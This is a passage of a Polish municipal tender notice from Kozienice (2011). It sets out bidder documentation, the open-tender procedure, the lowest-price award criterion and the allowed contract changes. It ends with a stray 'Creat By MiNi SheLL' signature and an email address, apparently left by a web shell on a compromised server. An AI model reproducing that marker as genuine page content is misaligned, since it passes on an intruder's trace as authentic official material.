<p>- w przypadku gdy wykonawca będzie polegał na wiedzy, doświadczeniu i osobach zdolnych do wykonania zamówienia innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy - w takiej sytuacji zobowiązany jest przedłożyć pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (np. wg wzoru - załącznik nr 7 lub inny równoważny dokument zawierający zakres określony w pkt. 8.1.2.1.siwz),
- stosowne Pełnomocnictwo do reprezentacji - jeżeli osoby podpisujące ofertę działają na podstawie pełnomocnictwa - musi zostać ono złożone jako część oferty w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza,
- w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego,
Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa  w pkt. III.4.3.1), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania następujących zmian postanowień zawartej umowy w stosunku do treści oferty:
1.Terminu wykonania zadania w następujących przypadkach :
1.1.Niesprzyjających warunków  pogodowych.
1.2.Niedopełnieniu przez Zamawiającego jego obowiązków wynikających 
              z umowy.
1.3.Z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu 
      zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te  
      zmiany są korzystne dla Zamawiającego.
1.4.Z powodu wystąpienia dodatkowych, a niemożliwych do przewidzenia przed  
              zawarciem umowy przez doświadczonego wykonawcę, robót.
1.5.Z powodu okoliczności siły wyższej, np. wystapienia zdarzenia losowego 
              wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z 
              pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu lub 
              grożącego powstaniem szkody w znacznych rozmiarach.
1.6.Z powodu stanu wyższej konieczności, powodującego podjęcie działań w celu 
              uchylenia bezpośredniego niebezpieczeństwa grożącego dobru społecznemu lub 
              jakiemukolwiek dobru jednostki,
1.7.Z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to 
              działania nie są konsekwencją winy którejkolwiek ze stron.
1.8.Zawieszenie wykonania prac nie spowodowanych uchybieniami Wykonawcy,
2.W przypadku zaistnienia potrzeby zmiany rozwiązań technicznych gdy proponowane 
rozwiązanie jest równorzędne lub lepsze funkcjonalnie od zaproponowanego 
w projekcie,
3.Gdy wystąpiły takie okoliczności, których nie można było przewidzieć w chwili zawarcia 
        umowy i na które strony nie miały wpływu,
4.W przypadku zaistnienia uzasadnionej potrzeby zmiany podwykonawcy. 
Jeżeli wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu posługiwał się zasobami dotychczasowego podwykonawcy, zmiana podwykonawcy możliwa jest pod warunkiem gdy nowy podwykonawca wykaże spełnianie warunków udziału w postępowaniu w zakresie wskazanym na etapie postępowania o zamówienie publiczne, przedkładając wymagane dokumenty. 
5.Gdy nastąpi zmiana stawki podatku VAT przez władzę ustawodawczą w trakcie trwania 
           umowy, wynikającej ze zmiany ustawy o podatku od towarów i usług oraz podatku  
           akcyzowego.
6.Gdy nastąpi zmiana przepisów prawnych mających wpływ na realizacje umowy, w 
                                       szczególności na jej zakres,termin.
7.Gdy nastąpi zmiana formy organizacyjno - prawnej lub siedziby Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kozienice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Kozienicach, 26-900 Kozienice, ul. Parkowa 5, pok. nr 12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.05.2011 godzina 11:45, miejsce: Urząd Miejski w Kozienicach, 26-900 Kozienice, ul. Parkowa 5, pok. nr 111.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com